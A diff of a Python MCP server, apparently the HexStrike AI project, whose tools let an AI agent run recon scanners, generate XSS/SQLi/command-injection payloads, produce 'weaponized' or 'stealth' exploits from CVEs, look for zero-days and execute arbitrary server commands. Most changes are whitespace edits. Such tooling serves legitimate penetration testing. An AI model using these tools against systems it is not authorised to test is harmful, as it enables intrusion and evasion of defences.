- + Args: urls: URLs to process replacement: Replacement string for parameters additional_args: Additional qsreplace arguments - + Returns: Parameter replacement results for fuzzing """ @@ -2768,17 +2768,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: return result @mcp.tool() - def uro_url_filtering(urls: str, whitelist: str = "", blacklist: str = "", + def uro_url_filtering(urls: str, whitelist: str = "", blacklist: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute uro for filtering out similar URLs. - + Args: urls: URLs to filter whitelist: Whitelist patterns blacklist: Blacklist patterns additional_args: Additional uro arguments - + Returns: Filtered URL results with duplicates removed """ @@ -2804,13 +2804,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def ai_generate_payload(attack_type: str, complexity: str = "basic", technology: str = "", url: str = "") -> Dict[str, Any]: """ Generate AI-powered contextual payloads for security testing. - + Args: attack_type: Type of attack (xss, sqli, lfi, cmd_injection, ssti, xxe) complexity: Complexity level (basic, advanced, bypass) technology: Target technology (php, asp, jsp, python, nodejs) url: Target URL for context - + Returns: Contextual payloads with risk assessment and test cases """ @@ -2822,12 +2822,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿค– Generating AI payloads for {attack_type} attack") result = hexstrike_client.safe_post("api/ai/generate_payload", data) - + if result.get("success"): payload_data = result.get("ai_payload_generation", {}) count = payload_data.get("payload_count", 0) logger.info(f"โœ… Generated {count} contextual {attack_type} payloads") - + # Log some example payloads for user awareness payloads = payload_data.get("payloads", []) if payloads: @@ -2838,19 +2838,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" โ”œโ”€ [{risk}] {context}: {payload_info['payload'][:50]}...") else: logger.error("โŒ AI payload generation failed") - + return result @mcp.tool() def ai_test_payload(payload: str, target_url: str, method: str = "GET") -> Dict[str, Any]: """ Test generated payload against target with AI analysis. - + Args: payload: The payload to test target_url: Target URL to test against method: HTTP method (GET, POST) - + Returns: Test results with AI analysis and vulnerability assessment """ @@ -2861,30 +2861,30 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿงช Testing AI payload against {target_url}") result = hexstrike_client.safe_post("api/ai/test_payload", data) - + if result.get("success"): analysis = result.get("ai_analysis", {}) potential_vuln = analysis.get("potential_vulnerability", False) logger.info(f"๐Ÿ” Payload test completed | Vulnerability detected: {potential_vuln}") - + if potential_vuln: logger.warning("โš ๏ธ Potential vulnerability found! Review the response carefully.") else: logger.info("โœ… No obvious vulnerability indicators detected") else: logger.error("โŒ Payload testing failed") - + return result @mcp.tool() def ai_generate_attack_suite(target_url: str, attack_types: str = "xss,sqli,lfi") -> Dict[str, Any]: """ Generate comprehensive attack suite with multiple payload types. 
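        Example (placeholder target; attack types drawn from the supported list):
            ai_generate_attack_suite("https://example.com", "xss,sqli")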
- + Args: target_url: Target URL for testing attack_types: Comma-separated list of attack types - + Returns: Comprehensive attack suite with multiple payload types """ @@ -2899,34 +2899,34 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "test_cases": 0 } } - + logger.info(f"🚀 Generating comprehensive attack suite for {target_url}") logger.info(f"🎯 Attack types: {', '.join(attack_list)}") - + for attack_type in attack_list: logger.info(f"🤖 Generating {attack_type} payloads...") - + # Generate payloads for this attack type (direct closure call; these tools are nested functions with no enclosing class, so no self) payload_result = ai_generate_payload(attack_type, "advanced", "", target_url) - + if payload_result.get("success"): payload_data = payload_result.get("ai_payload_generation", {}) results["payload_suites"][attack_type] = payload_data - + # Update summary results["summary"]["total_payloads"] += payload_data.get("payload_count", 0) results["summary"]["test_cases"] += len(payload_data.get("test_cases", [])) - + # Count high-risk payloads for payload_info in payload_data.get("payloads", []): if payload_info.get("risk_level") == "HIGH": results["summary"]["high_risk_payloads"] += 1 - + logger.info(f"✅ Attack suite generated:") logger.info(f" ├─ Total payloads: {results['summary']['total_payloads']}") logger.info(f" ├─ High-risk payloads: {results['summary']['high_risk_payloads']}") logger.info(f" └─ Test cases: {results['summary']['test_cases']}") - + return { "success": True, "attack_suite": results, @@ -2941,13 +2941,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def api_fuzzer(base_url: str, endpoints: str = "", methods: str = "GET,POST,PUT,DELETE", wordlist: str = "/usr/share/wordlists/api/api-endpoints.txt") -> Dict[str, Any]: """ Advanced API endpoint fuzzing with intelligent parameter discovery. - + Args: base_url: Base URL of the API endpoints: Comma-separated list of specific endpoints to test methods: HTTP methods to test (comma-separated) wordlist: Wordlist for endpoint discovery - + Returns: API fuzzing results with endpoint discovery and vulnerability assessment """ @@ -2957,10 +2957,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "methods": [m.strip() for m in methods.split(",")], "wordlist": wordlist } - + logger.info(f"🔍 Starting API fuzzing: {base_url}") result = hexstrike_client.safe_post("api/tools/api_fuzzer", data) - + if result.get("success"): fuzzing_type = result.get("fuzzing_type", "unknown") if fuzzing_type == "endpoint_testing": @@ -2970,20 +2970,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"✅ API endpoint discovery completed") else: logger.error("❌ API fuzzing failed") - + return result @mcp.tool() def graphql_scanner(endpoint: str, introspection: bool = True, query_depth: int = 10, test_mutations: bool = True) -> Dict[str, Any]: """ Advanced GraphQL security scanning and introspection.
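        Example (placeholder endpoint; a shallow query depth keeps the scan quick):
            graphql_scanner("https://example.com/graphql", query_depth=5)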
- + Args: endpoint: GraphQL endpoint URL introspection: Test introspection queries query_depth: Maximum query depth to test test_mutations: Test mutation operations - + Returns: GraphQL security scan results with vulnerability assessment """ @@ -2993,17 +2993,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "query_depth": query_depth, "test_mutations": test_mutations } - + logger.info(f"๐Ÿ” Starting GraphQL security scan: {endpoint}") result = hexstrike_client.safe_post("api/tools/graphql_scanner", data) - + if result.get("success"): scan_results = result.get("graphql_scan_results", {}) vuln_count = len(scan_results.get("vulnerabilities", [])) tests_count = len(scan_results.get("tests_performed", [])) - + logger.info(f"โœ… GraphQL scan completed: {tests_count} tests, {vuln_count} vulnerabilities") - + if vuln_count > 0: logger.warning(f"โš ๏ธ Found {vuln_count} GraphQL vulnerabilities!") for vuln in scan_results.get("vulnerabilities", [])[:3]: # Show first 3 @@ -3012,18 +3012,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.warning(f" โ”œโ”€ [{severity}] {vuln_type}") else: logger.error("โŒ GraphQL scanning failed") - + return result @mcp.tool() def jwt_analyzer(jwt_token: str, target_url: str = "") -> Dict[str, Any]: """ Advanced JWT token analysis and vulnerability testing. - + Args: jwt_token: JWT token to analyze target_url: Optional target URL for testing token manipulation - + Returns: JWT analysis results with vulnerability assessment and attack vectors """ @@ -3031,18 +3031,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "jwt_token": jwt_token, "target_url": target_url } - + logger.info(f"๐Ÿ” Starting JWT security analysis") result = hexstrike_client.safe_post("api/tools/jwt_analyzer", data) - + if result.get("success"): analysis = result.get("jwt_analysis_results", {}) vuln_count = len(analysis.get("vulnerabilities", [])) algorithm = analysis.get("token_info", {}).get("algorithm", "unknown") - + logger.info(f"โœ… JWT analysis completed: {vuln_count} vulnerabilities found") logger.info(f"๐Ÿ” Token algorithm: {algorithm}") - + if vuln_count > 0: logger.warning(f"โš ๏ธ Found {vuln_count} JWT vulnerabilities!") for vuln in analysis.get("vulnerabilities", [])[:3]: # Show first 3 @@ -3051,18 +3051,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.warning(f" โ”œโ”€ [{severity}] {vuln_type}") else: logger.error("โŒ JWT analysis failed") - + return result @mcp.tool() def api_schema_analyzer(schema_url: str, schema_type: str = "openapi") -> Dict[str, Any]: """ Analyze API schemas and identify potential security issues. 
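        Example (placeholder schema URL):
            api_schema_analyzer("https://example.com/openapi.json", "openapi")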
- + Args: schema_url: URL to the API schema (OpenAPI/Swagger/GraphQL) schema_type: Type of schema (openapi, swagger, graphql) - + Returns: Schema analysis results with security issues and recommendations """ @@ -3070,24 +3070,24 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "schema_url": schema_url, "schema_type": schema_type } - + logger.info(f"🔍 Starting API schema analysis: {schema_url}") result = hexstrike_client.safe_post("api/tools/api_schema_analyzer", data) - + if result.get("success"): analysis = result.get("schema_analysis_results", {}) endpoint_count = len(analysis.get("endpoints_found", [])) issue_count = len(analysis.get("security_issues", [])) - + logger.info(f"✅ Schema analysis completed: {endpoint_count} endpoints, {issue_count} issues") - + if issue_count > 0: logger.warning(f"⚠️ Found {issue_count} security issues in schema!") for issue in analysis.get("security_issues", [])[:3]: # Show first 3 severity = issue.get("severity", "UNKNOWN") issue_type = issue.get("issue", "unknown") logger.warning(f" ├─ [{severity}] {issue_type}") - + if endpoint_count > 0: logger.info(f"📊 Discovered endpoints:") for endpoint in analysis.get("endpoints_found", [])[:5]: # Show first 5 @@ -3096,20 +3096,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" ├─ {method} {path}") else: logger.error("❌ Schema analysis failed") - + return result @mcp.tool() def comprehensive_api_audit(base_url: str, schema_url: str = "", jwt_token: str = "", graphql_endpoint: str = "") -> Dict[str, Any]: """ Comprehensive API security audit combining multiple testing techniques. - + Args: base_url: Base URL of the API schema_url: Optional API schema URL jwt_token: Optional JWT token for analysis graphql_endpoint: Optional GraphQL endpoint - + Returns: Comprehensive audit results with all API security tests """ @@ -3121,16 +3121,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "summary": {}, "recommendations": [] } - + logger.info(f"🚀 Starting comprehensive API security audit: {base_url}") - + # 1. API Endpoint Fuzzing (direct call to the sibling api_fuzzer closure; these tools are nested functions, not methods, so no self) logger.info("🔍 Phase 1: API endpoint discovery and fuzzing") fuzz_result = api_fuzzer(base_url) if fuzz_result.get("success"): audit_results["tests_performed"].append("api_fuzzing") audit_results["api_fuzzing"] = fuzz_result - + # 2. Schema Analysis (if provided) if schema_url: logger.info("🔍 Phase 2: API schema analysis") @@ -3138,10 +3138,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if schema_result.get("success"): audit_results["tests_performed"].append("schema_analysis") audit_results["schema_analysis"] = schema_result - + schema_data = schema_result.get("schema_analysis_results", {}) audit_results["total_vulnerabilities"] += len(schema_data.get("security_issues", [])) - + # 3. JWT Analysis (if provided) if jwt_token: logger.info("🔍 Phase 3: JWT token analysis") @@ -3149,10 +3149,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if jwt_result.get("success"): audit_results["tests_performed"].append("jwt_analysis") audit_results["jwt_analysis"] = jwt_result - + jwt_data = jwt_result.get("jwt_analysis_results", {}) audit_results["total_vulnerabilities"] += len(jwt_data.get("vulnerabilities", [])) - + # 4.
GraphQL Testing (if provided) if graphql_endpoint: logger.info("๐Ÿ” Phase 4: GraphQL security scanning") @@ -3160,10 +3160,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if graphql_result.get("success"): audit_results["tests_performed"].append("graphql_scanning") audit_results["graphql_scanning"] = graphql_result - + graphql_data = graphql_result.get("graphql_scan_results", {}) audit_results["total_vulnerabilities"] += len(graphql_data.get("vulnerabilities", [])) - + # Generate comprehensive recommendations audit_results["recommendations"] = [ "Implement proper authentication and authorization", @@ -3175,19 +3175,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Keep API documentation updated and secure", "Implement proper error handling" ] - + # Summary audit_results["summary"] = { "tests_performed": len(audit_results["tests_performed"]), "total_vulnerabilities": audit_results["total_vulnerabilities"], "audit_coverage": "comprehensive" if len(audit_results["tests_performed"]) >= 3 else "partial" } - + logger.info(f"โœ… Comprehensive API audit completed:") logger.info(f" โ”œโ”€ Tests performed: {audit_results['summary']['tests_performed']}") logger.info(f" โ”œโ”€ Total vulnerabilities: {audit_results['summary']['total_vulnerabilities']}") logger.info(f" โ””โ”€ Coverage: {audit_results['summary']['audit_coverage']}") - + return { "success": True, "comprehensive_audit": audit_results @@ -3201,13 +3201,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def volatility3_analyze(memory_file: str, plugin: str, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Volatility3 for advanced memory forensics with enhanced logging. - + Args: memory_file: Path to memory dump file plugin: Volatility3 plugin to execute output_file: Output file path additional_args: Additional Volatility3 arguments - + Returns: Advanced memory forensics results """ @@ -3229,13 +3229,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def foremost_carving(input_file: str, output_dir: str = "/tmp/foremost_output", file_types: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Foremost for file carving with enhanced logging. - + Args: input_file: Input file or device to carve output_dir: Output directory for carved files file_types: File types to carve (jpg,gif,png,etc.) additional_args: Additional Foremost arguments - + Returns: File carving results """ @@ -3257,7 +3257,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def steghide_analysis(action: str, cover_file: str, embed_file: str = "", passphrase: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Steghide for steganography analysis with enhanced logging. - + Args: action: Action to perform (extract, embed, info) cover_file: Cover file for steganography @@ -3265,7 +3265,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: passphrase: Passphrase for steganography output_file: Output file path additional_args: Additional Steghide arguments - + Returns: Steganography analysis results """ @@ -3289,13 +3289,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def exiftool_extract(file_path: str, output_format: str = "", tags: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute ExifTool for metadata extraction with enhanced logging. 
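        Example (placeholder file path):
            exiftool_extract("/tmp/evidence/photo.jpg", output_format="json")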
- + Args: file_path: Path to file for metadata extraction output_format: Output format (json, xml, csv) tags: Specific tags to extract additional_args: Additional ExifTool arguments - + Returns: Metadata extraction results """ @@ -3317,14 +3317,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def hashpump_attack(signature: str, data: str, key_length: str, append_data: str, additional_args: str = "") -> Dict[str, Any]: """ Execute HashPump for hash length extension attacks with enhanced logging. - + Args: signature: Original hash signature data: Original data key_length: Length of secret key append_data: Data to append additional_args: Additional HashPump arguments - + Returns: Hash length extension attack results """ @@ -3351,16 +3351,23 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def hakrawler_crawl(url: str, depth: int = 2, forms: bool = True, robots: bool = True, sitemap: bool = True, wayback: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Hakrawler for web endpoint discovery with enhanced logging. - + + Note: Uses standard Kali Linux hakrawler (hakluke/hakrawler) with parameter mapping: + - url: Piped via echo to stdin (not -url flag) + - depth: Mapped to -d flag (not -depth) + - forms: Mapped to -s flag for showing sources + - robots/sitemap/wayback: Mapped to -subs for subdomain inclusion + - Always includes -u for unique URLs + Args: url: Target URL to crawl - depth: Crawling depth - forms: Include forms in crawling - robots: Check robots.txt - sitemap: Check sitemap.xml - wayback: Use Wayback Machine + depth: Crawling depth (mapped to -d) + forms: Include forms in crawling (mapped to -s) + robots: Check robots.txt (mapped to -subs) + sitemap: Check sitemap.xml (mapped to -subs) + wayback: Use Wayback Machine (mapped to -subs) additional_args: Additional Hakrawler arguments - + Returns: Web endpoint discovery results """ @@ -3385,7 +3392,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def httpx_probe(targets: str = "", target_file: str = "", ports: str = "", methods: str = "GET", status_code: str = "", content_length: bool = False, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute HTTPx for HTTP probing with enhanced logging. - + Args: targets: Target URLs or IPs target_file: File containing targets @@ -3395,7 +3402,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: content_length: Show content length output_file: Output file path additional_args: Additional HTTPx arguments - + Returns: HTTP probing results """ @@ -3421,14 +3428,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def paramspider_discovery(domain: str, exclude: str = "", output_file: str = "", level: int = 2, additional_args: str = "") -> Dict[str, Any]: """ Execute ParamSpider for parameter discovery with enhanced logging. - + Args: domain: Target domain exclude: Extensions to exclude output_file: Output file path level: Crawling level additional_args: Additional ParamSpider arguments - + Returns: Parameter discovery results """ @@ -3455,7 +3462,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def burpsuite_scan(project_file: str = "", config_file: str = "", target: str = "", headless: bool = False, scan_type: str = "", scan_config: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Burp Suite with enhanced logging. 
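        Example (placeholder target; assumes Burp Suite is available on the server):
            burpsuite_scan(target="https://example.com", headless=True)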
- + Args: project_file: Burp project file path config_file: Burp configuration file path @@ -3465,7 +3472,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: scan_config: Scan configuration output_file: Output file path additional_args: Additional Burp Suite arguments - + Returns: Burp Suite scan results """ @@ -3491,7 +3498,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def zap_scan(target: str = "", scan_type: str = "baseline", api_key: str = "", daemon: bool = False, port: str = "8090", host: str = "0.0.0.0", format_type: str = "xml", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute OWASP ZAP with enhanced logging. - + Args: target: Target URL scan_type: Type of scan (baseline, full, api) @@ -3502,7 +3509,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: format_type: Output format (xml, json, html) output_file: Output file path additional_args: Additional ZAP arguments - + Returns: ZAP scan results """ @@ -3529,7 +3536,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def arjun_scan(url: str, method: str = "GET", data: str = "", headers: str = "", timeout: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Arjun for parameter discovery with enhanced logging. - + Args: url: Target URL method: HTTP method (GET, POST, etc.) @@ -3538,7 +3545,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: timeout: Request timeout output_file: Output file path additional_args: Additional Arjun arguments - + Returns: Parameter discovery results """ @@ -3563,11 +3570,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def wafw00f_scan(target: str, additional_args: str = "") -> Dict[str, Any]: """ Execute wafw00f to identify and fingerprint WAF products with enhanced logging. - + Args: target: Target URL or IP additional_args: Additional wafw00f arguments - + Returns: WAF detection results """ @@ -3587,12 +3594,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def fierce_scan(domain: str, dns_server: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute fierce for DNS reconnaissance with enhanced logging. - + Args: domain: Target domain dns_server: DNS server to use additional_args: Additional fierce arguments - + Returns: DNS reconnaissance results """ @@ -3613,13 +3620,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def dnsenum_scan(domain: str, dns_server: str = "", wordlist: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute dnsenum for DNS enumeration with enhanced logging. - + Args: domain: Target domain dns_server: DNS server to use wordlist: Wordlist for brute forcing additional_args: Additional dnsenum arguments - + Returns: DNS enumeration results """ @@ -3681,7 +3688,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: ) -> Dict[str, Any]: """ Execute AutoRecon for comprehensive target enumeration with full parameter support. 
- + Args: target: Single target to scan target_file: File containing multiple targets @@ -3722,7 +3729,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: global_password_wordlist: Global password wordlist global_domain: Global domain additional_args: Additional AutoRecon arguments - + Returns: Comprehensive enumeration results with full configurability """ @@ -3778,12 +3785,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # SYSTEM MONITORING & TELEMETRY # ============================================================================ - + @mcp.tool() def server_health() -> Dict[str, Any]: """ Check the health status of the HexStrike AI server. - + Returns: Server health information with tool availability and telemetry """ @@ -3799,7 +3806,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_cache_stats() -> Dict[str, Any]: """ Get cache statistics from the HexStrike AI server. - + Returns: Cache performance statistics """ @@ -3813,7 +3820,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def clear_cache() -> Dict[str, Any]: """ Clear the cache on the HexStrike AI server. - + Returns: Cache clear operation results """ @@ -3829,7 +3836,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_telemetry() -> Dict[str, Any]: """ Get system telemetry from the HexStrike AI server. - + Returns: System performance and usage telemetry """ @@ -3838,7 +3845,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if "commands_executed" in result: logger.info(f"๐Ÿ“Š Commands executed: {result.get('commands_executed', 0)}") return result - + # ============================================================================ # PROCESS MANAGEMENT TOOLS (v5.0 ENHANCEMENT) # ============================================================================ @@ -3847,7 +3854,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def list_active_processes() -> Dict[str, Any]: """ List all active processes on the HexStrike AI server. - + Returns: List of active processes with their status and progress """ @@ -3863,10 +3870,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_process_status(pid: int) -> Dict[str, Any]: """ Get the status of a specific process. - + Args: pid: Process ID to check - + Returns: Process status information including progress and runtime """ @@ -3882,10 +3889,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def terminate_process(pid: int) -> Dict[str, Any]: """ Terminate a specific running process. - + Args: pid: Process ID to terminate - + Returns: Success status of the termination operation """ @@ -3901,10 +3908,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def pause_process(pid: int) -> Dict[str, Any]: """ Pause a specific running process. - + Args: pid: Process ID to pause - + Returns: Success status of the pause operation """ @@ -3920,10 +3927,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def resume_process(pid: int) -> Dict[str, Any]: """ Resume a paused process. - + Args: pid: Process ID to resume - + Returns: Success status of the resume operation """ @@ -3939,7 +3946,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_process_dashboard() -> Dict[str, Any]: """ Get enhanced process dashboard with visual status indicators. 
- + Returns: Real-time dashboard with progress bars, system metrics, and process status """ @@ -3948,7 +3955,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if result.get("success", True) and "total_processes" in result: total = result.get("total_processes", 0) logger.info(f"โœ… Dashboard retrieved: {total} active processes") - + # Log visual summary for better UX if total > 0: logger.info("๐Ÿ“ˆ Active Processes Summary:") @@ -3957,16 +3964,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: else: logger.error("โŒ Failed to get process dashboard") return result - + @mcp.tool() def execute_command(command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute an arbitrary command on the HexStrike AI server with enhanced logging. - + Args: command: The command to execute use_cache: Whether to use caching for this command - + Returns: Command execution results with enhanced telemetry """ @@ -3981,13 +3988,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "stdout": "", "stderr": f"Error executing command: {result['error']}" } - + if result.get("success"): execution_time = result.get("execution_time", 0) logger.info(f"โœ… Command completed successfully in {execution_time:.2f}s") else: logger.warning(f"โš ๏ธ Command completed with errors") - + return result except Exception as e: logger.error(f"๐Ÿ’ฅ Error executing command '{command}': {str(e)}") @@ -4006,15 +4013,15 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def monitor_cve_feeds(hours: int = 24, severity_filter: str = "HIGH,CRITICAL", keywords: str = "") -> Dict[str, Any]: """ Monitor CVE databases for new vulnerabilities with AI analysis. - + Args: hours: Hours to look back for new CVEs (default: 24) severity_filter: Filter by CVSS severity - comma-separated values (LOW,MEDIUM,HIGH,CRITICAL,ALL) keywords: Filter CVEs by keywords in description (comma-separated) - + Returns: Latest CVEs with exploitability analysis and threat intelligence - + Example: monitor_cve_feeds(48, "CRITICAL", "remote code execution") """ @@ -4025,29 +4032,29 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ” Monitoring CVE feeds for last {hours} hours | Severity: {severity_filter}") result = hexstrike_client.safe_post("api/vuln-intel/cve-monitor", data) - + if result.get("success"): cve_count = len(result.get("cve_monitoring", {}).get("cves", [])) exploit_analysis_count = len(result.get("exploitability_analysis", [])) logger.info(f"โœ… Found {cve_count} CVEs with {exploit_analysis_count} exploitability analyses") - + return result @mcp.tool() def generate_exploit_from_cve(cve_id: str, target_os: str = "", target_arch: str = "x64", exploit_type: str = "poc", evasion_level: str = "none") -> Dict[str, Any]: """ Generate working exploits from CVE information using AI-powered analysis. 
- + Args: cve_id: CVE identifier (e.g., CVE-2024-1234) target_os: Target operating system (windows, linux, macos, any) target_arch: Target architecture (x86, x64, arm, any) exploit_type: Type of exploit to generate (poc, weaponized, stealth) evasion_level: Evasion sophistication (none, basic, advanced) - + Returns: Generated exploit code with testing instructions and evasion techniques - + Example: generate_exploit_from_cve("CVE-2024-1234", "linux", "x64", "weaponized", "advanced") """ @@ -4060,31 +4067,31 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿค– Generating {exploit_type} exploit for {cve_id} | Target: {target_os} {target_arch}") result = hexstrike_client.safe_post("api/vuln-intel/exploit-generate", data) - + if result.get("success"): cve_analysis = result.get("cve_analysis", {}) exploit_gen = result.get("exploit_generation", {}) exploitability = cve_analysis.get("exploitability_level", "UNKNOWN") exploit_success = exploit_gen.get("success", False) - + logger.info(f"๐Ÿ“Š CVE Analysis: {exploitability} exploitability") logger.info(f"๐ŸŽฏ Exploit Generation: {'SUCCESS' if exploit_success else 'FAILED'}") - + return result @mcp.tool() def discover_attack_chains(target_software: str, attack_depth: int = 3, include_zero_days: bool = False) -> Dict[str, Any]: """ Discover multi-stage attack chains for target software with vulnerability correlation. - + Args: target_software: Target software/system (e.g., "Apache HTTP Server", "Windows Server 2019") attack_depth: Maximum number of stages in attack chain (1-5) include_zero_days: Include potential zero-day vulnerabilities in analysis - + Returns: Attack chains with vulnerability combinations, success probabilities, and exploit availability - + Example: discover_attack_chains("Apache HTTP Server 2.4", 4, True) """ @@ -4095,36 +4102,36 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ”— Discovering attack chains for {target_software} | Depth: {attack_depth} | Zero-days: {include_zero_days}") result = hexstrike_client.safe_post("api/vuln-intel/attack-chains", data) - + if result.get("success"): chains = result.get("attack_chain_discovery", {}).get("attack_chains", []) enhanced_chains = result.get("attack_chain_discovery", {}).get("enhanced_chains", []) - + logger.info(f"๐Ÿ“Š Found {len(chains)} attack chains") if enhanced_chains: logger.info(f"๐ŸŽฏ Enhanced {len(enhanced_chains)} chains with exploit analysis") - + return result @mcp.tool() def research_zero_day_opportunities(target_software: str, analysis_depth: str = "standard", source_code_url: str = "") -> Dict[str, Any]: """ Automated zero-day vulnerability research using AI analysis and pattern recognition. 
- + Args: target_software: Software to research for vulnerabilities (e.g., "nginx", "OpenSSL") analysis_depth: Depth of analysis (quick, standard, comprehensive) source_code_url: URL to source code repository for enhanced analysis - + Returns: Potential vulnerability areas with exploitation feasibility and research recommendations - + Example: research_zero_day_opportunities("nginx 1.20", "comprehensive", "https://github.com/nginx/nginx") """ if analysis_depth not in ["quick", "standard", "comprehensive"]: analysis_depth = "standard" - + data = { "target_software": target_software, "analysis_depth": analysis_depth, @@ -4132,30 +4139,30 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ”ฌ Researching zero-day opportunities in {target_software} | Depth: {analysis_depth}") result = hexstrike_client.safe_post("api/vuln-intel/zero-day-research", data) - + if result.get("success"): research = result.get("zero_day_research", {}) potential_vulns = len(research.get("potential_vulnerabilities", [])) risk_score = research.get("risk_assessment", {}).get("risk_score", 0) - + logger.info(f"๐Ÿ“Š Found {potential_vulns} potential vulnerability areas") logger.info(f"๐ŸŽฏ Risk Score: {risk_score}/100") - + return result @mcp.tool() def correlate_threat_intelligence(indicators: str, timeframe: str = "30d", sources: str = "all") -> Dict[str, Any]: """ Correlate threat intelligence across multiple sources with advanced analysis. - + Args: indicators: Comma-separated IOCs (IPs, domains, hashes, CVEs, etc.) timeframe: Time window for correlation (7d, 30d, 90d, 1y) sources: Intelligence sources to query (cve, exploit-db, github, twitter, all) - + Returns: Correlated threat intelligence with attribution, timeline, and threat scoring - + Example: correlate_threat_intelligence("CVE-2024-1234,192.168.1.100,malware.exe", "90d", "all") """ @@ -4163,14 +4170,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: valid_timeframes = ["7d", "30d", "90d", "1y"] if timeframe not in valid_timeframes: timeframe = "30d" - + # Parse indicators indicator_list = [i.strip() for i in indicators.split(",") if i.strip()] - + if not indicator_list: logger.error("โŒ No valid indicators provided") return {"success": False, "error": "No valid indicators provided"} - + data = { "indicators": indicator_list, "timeframe": timeframe, @@ -4178,43 +4185,43 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿง  Correlating threat intelligence for {len(indicator_list)} indicators | 